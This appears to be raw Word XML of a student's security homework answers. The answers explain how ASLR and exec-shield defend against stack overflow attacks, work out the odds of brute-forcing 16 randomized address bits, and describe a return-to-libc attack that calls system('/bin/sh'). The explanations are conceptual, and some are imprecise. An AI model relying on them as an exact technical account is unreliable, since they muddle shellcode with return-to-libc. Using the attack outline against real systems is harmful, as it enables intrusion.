        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Section IV (Task IV)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9E0AC" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Discuss the reason that randomization can defeat the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED0843" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">Address space layout randomization: The theory is to make injecting malicious code more difficult by randomizing where items are in memory. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Knowing where items </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>are located i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory are vital for a successful buffer and stack overflow attacks. This knowledge allows the injection of code that can make valid memory references. Even with these precautions taken it may still be possible for an injection consisting of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>self contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> code to make valid memory reference when allowing malicious code to execute. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62F41E" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Assume only the low 16 bits of the stack address is randomized. What is the probability that an exploiting packet can compromise the server? Assume an attacker can send 10 exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">loiting packets every second. How long can the attacker compromise the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B3BED73" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>The probability of an exploiting packet to compromise the server is given by [1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>2^16)]. If an attacker sends 10 exploiting packets per second, the total time taken by an attacke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r to compromise the server is [2^16/10sec].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75114AB6" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Discuss the reason that exec-shield can defeat the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C24B9" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>The stack is a location where data is placed, leading to attackers attempting to place malicious code onto the stack. The data stored on the stack is not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> executed, resulting in the attacker’s data that was placed on the stack to not be executed as well. This scheme is called exec-shield. One problem with exec-shield is that it does not prevent stack overflow. This allows attackers to place a large amount o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">f code onto the stack, this code will not be executed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exec-shield scheme. This leads to the stack overflowing and is known as stack smashing. This method is one of the older ones and grants </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to infected computers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C9A9BE" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Discuss if exec-shi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>eld prevents stack overflow. If not, what attack can be achieved?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1181C461" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="220"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to attempt to prevent a stack overflow attack the exec-shield works by making the stack non-executable, which cannot completely beat such an attack because not all code must be run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">off the stack in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> system. An attack such as the “Return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">” attack can execute malicious code without running any code off the stack. It does by exploiting the shared library in UNIX style operating systems called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can be accessed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>all applications as it is already in the memory portion of the shared runtime library. The attack will use shellcode to modify the return address on the stack, however unlike a stack-based exploit the return address is pointed to the entry point of the sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">tem function in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>, rather than any malicious injected code. In doing this the attacker can force the launch of the shell by running system(“/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">”) by the intended program. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00465809">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674690" w14:textId="77777777" w:rsidR="00450A5F" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D457185" w14:textId="77777777" w:rsidR="00450A5F" w:rsidRDefault="00450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7E1491" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="0046580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16AE34" w14:textId="77777777" w:rsidR="00450A5F" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="427669F0" w14:textId="77777777" w:rsidR="00450A5F" w:rsidRDefault="00450A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4573A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F8B9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56E2083"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D55E327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7C3F4200"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72E887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809"/>
    <w:rsid w:val="00450A5F"/>
    <w:rsid w:val="00465809"/>
    <w:rsid w:val="00905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01550"/>
  <w15:docId w15:val="{6D8B0C67-E416-4F6E-936C-2C01568B4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0530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53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672</Words>
  <Characters>3831</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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Tyler Perkins</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-13T17:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-13T17:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>